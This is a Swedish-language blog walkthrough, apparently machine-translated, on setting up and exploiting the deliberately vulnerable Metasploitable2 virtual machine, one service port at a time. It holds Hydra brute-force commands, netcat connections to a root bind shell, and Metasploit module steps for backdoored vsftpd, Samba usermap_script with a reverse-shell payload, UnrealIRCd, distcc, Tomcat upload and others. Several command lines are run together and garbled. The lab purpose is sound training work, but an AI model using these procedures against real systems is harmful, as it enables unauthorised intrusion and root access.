Metasploitable2

Metasploitable är en avsiktligt sårbar virtuell Linux-maskin.

Denna virtuella maskin kan användas för att genomföra säkerhetsutbildningar, testa säkerhetsverktyg och öva på vanliga metoder för penetrationstestning.

Installation och konfiguration

Vi är här för att utnyttja Metasploitable 2 (Förbannat sårbar maskin för penetrationstestning)

Hämta denna Metasploiable2-maskin från https://information.rapid7.com/download-metasploitable-2017.html

Installationsprocess:

  1. Öppna VirtualBox och klicka på ”New”-knappen för att skapa en ny virtuell maskin
  2. Typ namnet på den virtuella maskinen (Metasploitable2)
  3. Allokera minnesmängden (helst men inte under 512mb)
  4. Välj Använd en befintlig hårddiskfil
  5. Välj vmdk-filen som du har laddat ner från Rapid7
  6. Klicka på Create…!!! Framgångsrik installation av Metasploitable2, Nu är det dags att konfigurera nätverksinställningarna.

Efter installationen ändrar du inställningarna för nätverkskortet enligt följande :

In-Network Setting: Välj Ethernet eller Trådlöst

I fliken Avancerat Välj: Inställningar/Nätverk/Adapter: Promiscuous Mode as Allow All

Starta Metasploitable2-maskinen och försök att logga in med de givna inloggningsuppgifterna på Banner…!!!!

Hitta maskinens IP-adress genom att använda följande kommandot i terminalen

ifconfig

Det var allt för installationen….Låt oss börja hacka…

Scanning

Scanning av Matasploitable 2

Som vi märkte är maskinens IP-adress 192.168.0.130

Låt oss börja skanna med Nmap som är en del av Kali Linux

nmap -sV -p- 192.168.0.130

Exploatering av alla portar i olika tekniker :

Metod 1:

Inloggning med Anonymous som användarnamn och utan lösenord.

Om du behöver mer information om Anonymous FTP kan du hitta den här.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Metod 2 :

Genom Brute-force med hjälp av Hydra, men du måste ha en anpassad lista med användarnamn och lösenord.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

Den kommer att ta varje användarnamn och lösenord från de givna filerna och försöka logga in på FTP-tjänsten.

När du har hittat inloggningsuppgifterna kan du logga in direkt.

När du har loggat in på ett användarkonto kan du få root-åtkomst genom att göra Privilege escalation.

Metod 3 :

Exploiting FTP through Metasploit framework

open Metasploit framework console and search for vsftpd Backdoor exploit

msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor

show options

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Gratulationer, du har fått rotåtkomst

22-SSH

Secure Shell (SSH) är ett kryptografiskt nätverksprotokoll för säker drift av nätverkstjänster över ett osäkrat nätverk.

Exploatering av SSH med olika tekniker

Metod 1

Kracka användarnamn och lösenord med Hydra

Hydra är ett inbyggt verktyg i Kali-Linux som används för att Brute force-attack är en trial-and-error-metod som används av tillämpningsprogram för att avkoda krypterade data, t.ex. lösenord eller DES-nycklar (Data Encryption Standard), genom uttömmande ansträngning (med hjälp av brute force) snarare än genom att använda intellektuella strategier.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

Metod 2

Öppna Metasploit ramverk

Öppna terminalen och skriv dessa kommandon :

service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login

Sätt in den här hjälparen och se vad den kräver.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

Inställ fördefinierade användarnamn lista och lösenord lista

set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

Det kommer att ta tid-baserade dina användarnamn och lösenord lista och det kommer att meddela med användarnamn: lösenord och logga in med dessa uppgifter.

ssh username@targetipaddress

Du har användaraccess, kan inte utföra alla uppgifter så försök att få root-åtkomst genom att göra Privilege escalation.

23-TELNET

Telnet är ett enkelt, textbaserat nätverksprotokoll som används för att komma åt fjärrdatorer via TCP/IP-nätverk som Internet. Telnet skapades och lanserades 1969 och historiskt sett kan man säga att det var det första Internet.

telnet <target IP Address> --> 192.168.0.130

Som standard kommer den att Grab Metasploitable 2 banner, den visar att Logga in med msfadmin/msfadmin för att få en start. Ange bara dessa autentiseringsuppgifter så är du inne.

25-SMTP

SMTP är en del av applikationslagret i TCP/IP-protokollet. Med hjälp av en process som kallas ”store and forward” flyttar SMTP din e-post på och över nätverk. Det har ett nära samarbete med något som kallas Mail Transfer Agent (MTA) för att skicka din kommunikation till rätt dator och e-postinkorg.

Metod 1:

Användning av Metasploit

Starta Metasploit genom att utföra kommandona

service postgresql startmsfconsole -qsearch smtp_version

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run

SMTP står för Simple Mail Transport Protocol och är en server-till-server-protokoll och har en lokal databas med användare som den måste skicka och ta emot e-post till.

SMTP har en uppsättning kommandon. Vi kommer att ansluta till vårt mål med ”netcat” via port 25 och försöka förvärva denna databas e-postmeddelanden.

Öppna en ny terminal och skriv:

nc 192.168.0.130 25

Nu är anslutningen upprättad och du kan verifiera den med hjälp av ”SMTP”-kommandona

vrfy (Detta är ett icke-interaktivt skal)

För SMTP-kommandon besök: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Metod 2

Användning av smtp_enum

Detta kan göras av Metasploit

search smtp_enum

use auxiliary/scanner/smtp/smtp_enum

show optionsset RHOST 192.168.0.130exploit

Denna metod använder uppräkning för att ta reda på listan över användare i SMTP-tjänsten.

Senare NetCat kan vara till hjälp för att få en omvänd anslutning med den användaren.

139&445 Netbios-SSN

Samba är ett projekt med öppen källkod som används i stor utsträckning på Linux- och Unix-datorer för att de ska kunna arbeta med Windows fil- och utskriftstjänster.

Vi kan till och med använda Samba som en Active-server för att sköta inloggning, autentisering och åtkomstkontroll för ett Windows-nätverk.

Sök efter exploit

use exploit/multi/samba/usermap_script

.

För att se alternativen för exploateringen

show optionsSet RHOST192.168.0.130 (Target IP address)

Inställer nyttolast

Show payloadsSet payload cmd/unix/reverse

Inställer nödvändiga argument för nyttolast

.

Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

Kontrollera när alla erforderliga argument är fyllda

exploit

1099-Java-RMI

Remote Method Invocation (RMI) är ett API som gör det möjligt för ett objekt att åberopa en metod på ett objekt som finns i ett annat adressutrymme, som kan finnas på samma maskin eller en fjärrmaskin.

Exploatering av java-RMI-server

sök efter exploateringen

search java_rmi_server

Välj exploateringen enligt deras rang, till exempel fungerar ”utmärkt” bättre än ”normal”.

use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

Vi har fått tillgång till målmaskinen.

1524-BINDSHELL

Bind shell är en typ av shell där målmaskinen öppnar en kommunikationsport eller en lyssnare på offrets maskin och väntar på en inkommande anslutning. Angriparen ansluter sedan till offermaskinens lyssnare vilket sedan leder till att kod eller kommando exekveras på servern.

Exploatering

Det är ett rotskal så vi kan ansluta via netcat-tjänsten.

nc <target ip address> 1524

Gratulerar, du är en rotanvändare nu.

2121-ProFTPD

För att utnyttja denna port måste du ha inloggningsuppgifter så som vi vet metoden få det genom Brute-force teknik, Vi kan komma åt ProFTPd med telnet, Vi använder här user: user.

telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>

Det är en normal användare, Försök med Privilege Escalation för att få rotkontroll.

3306-MYSQL

Metod 1:

sök efter exploit

search scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

Ibland kan det finnas en chans att ha ett tomt lösenord för MySQL. Så vi kan utnyttja det direkt.

Notera: som standard visas BLANK_PASSWORDS som falsk, sätt det till true.

set BLANK_PASSWORDS as true

Metod:2

I den här metoden kommer vi att exploatera MySQL med hjälp av det här kommandot som anger användarnamnet root och målets IP.

mysql -u root -h <target's IP>

3632-DISTCCD

Distcc är ett verktyg för att påskynda kompileringen av källkod med hjälp av distribuerad databehandling över ett datornätverk. Med rätt konfiguration

distcc kan dramatiskt minska ett projekts kompileringstid

Exploatering av port 3632 med hjälp av distcc-exec

Öppna msfconsole och sök efter distcc_exec

search distcc_execshow options

Inställ nödvändiga argument för att exploatera

set RHOSTS <target-ip>exploit

Vi fick tillgång till skalan…Försök att göra privilegieeskalering för högre privilegier

Exploatering av PostgreSQL med postgre_payload

Öppna msfconsole & sök efter postgres_payload

.

search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

Inställ nödvändiga argument för exploateringen

set RHOSTS <target-ip>

Som standard, kommer den att använda användarnamn som postgres

exploit

Successfully logged in postgresql…Låt oss få ett skal för att göra fler saker…

Försök att göra privilegieeskalering…Glad inlärning..!!!

5900-VNC

Öppna msfconsole och sök efter exploit vnc_login

search vnc_loginuse auxiliary/scanner/vnc/vnc_login

show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit

Denna metod används för att utnyttja VNC-programvara som finns på Linux, Unix eller Windows operativsystem med autentiseringssårbarhet.

Försök att ansluta vnc med det lösenordet

Öppna Vnc Viewer i Terminal & Skriv in IP-adressen och anslut

en inloggningsfråga dyker upp. och ber dig ange inloggningsuppgifter

Inför sedan lösenordet och klicka på OK.

Voilaaa…!!!! du har Access…Jag vet vad du tänker just nu…Rör inte med saker runt omkring..Happy Learning.

6000-X11

The X Window System (alias X) är ett fönstersystem för bitmappskärmar, som är vanligt i UNIX-baserade operativsystem. X tillhandahåller den grundläggande ramen för en GUI-baserad miljö.

Den fjärrstyrda X11-servern accepterar anslutningar från varhelst man kan få en Internetanslutning. Den ansvarar för åtkomst till grafikkortet, inmatningsenheterna och bildskärmen på antingen datorn eller den trådlösa enheten.

Exploatering av port 6000 med hjälp av ssh

ssh -X -l msfadmin 192.168.0.122

I kommandot ovan aktiverar ”X” alla portar som vidarebefordras, genom att ange användarnamn och målets IP ger oss skalet

6667 & 6697 UnrealIRCD

UnrealIRCd är en IRC-server med öppen källkod som betjänar tusentals nätverk sedan 1999. Den körs på Linux, OS X och Windows

UnrealIRCd är en mycket avancerad IRCd med starkt fokus på modularitet, en avancerad och mycket konfigurerbar konfigurationsfil. Viktiga funktioner inkluderar SSL

UnrealIRCd är en av de mest populära och fullfjädrade IRC-daemonerna och används på det största antalet IRC-servrar

Den här servern beskrivs som att den kanske har flest säkerhetsfunktioner av alla IRC-servrar.

Använda protokoll: Internet Relay Chat

Låt oss utnyttja denna IRC-server.

Metod 1: på port 6667

search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

Inställ nödvändiga argument för exploatering

set RHOSTS <target-ip>

Som standard tilldelas portnummer 6667 till exploit

run (or) exploit

Heyyy….Vi har rot…Vi lever på gränsen…

Metod 2: På port 6697

Använd ovanstående exploit och ställ in de nödvändiga argumenten

  • Denna gång ställde du in port som 6697
set RHOSTS <target-ip>set RPORT 6697

Och för andra gången fick vi root…Försök att utnyttja detta…Happy learning

8180-TOMCAT

Apache Tomcat är en implementering med öppen källkod av teknikerna Java Servlet, JavaServer Pages, Java Expression Language och WebSocket. Tomcat tillhandahåller en ”ren Java” HTTP-webbservermiljö där Java-kod kan köras.

Exploiting Apache-Tomcat

Det kan göras i två steg:

Öppna msfconsole & sök efter tomcat_mgr_login

search tomcat_mgr_loginset RHOSTS <target-ip>

show options

Exploit kommer att tilldela standardanvändarnamn & lösenordslistor. Efter att ha ställt in argumenten för exploit Typ exploit (or) run

run

Ta samma användarnamn och lösenord och ge det till nästa exploit.

sök efter tomcat manager exploits

search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

Sätt RHOSTS, RPORT och HttpPassword, HttpUsername som vi fick från tomcat login exploit och kör sedan exploit.

msfconsole skulle kunna tilldela lämplig nyttolast för en exploatering, Det är därför vi fick meterpreter…

8787-Ruby-drb

dRuby är ett distribuerat objektsystem för Ruby. Det är skrivet i ren Ruby och använder dess protokoll.

Ingen tilläggstjänster behövs utöver dem som tillhandahålls av Ruby-körtiden, t.ex. TCP-socklar.

search drb_remote_codeexec

Inställ de nödvändiga argumenten för att utnyttja

show optionsset RHOSTS <target-ip>exploit (or) run

Grattis, du har fått tillgång till skalet som root… försök att använda några skalkommandon.

Lämna ett svar

Din e-postadress kommer inte publiceras.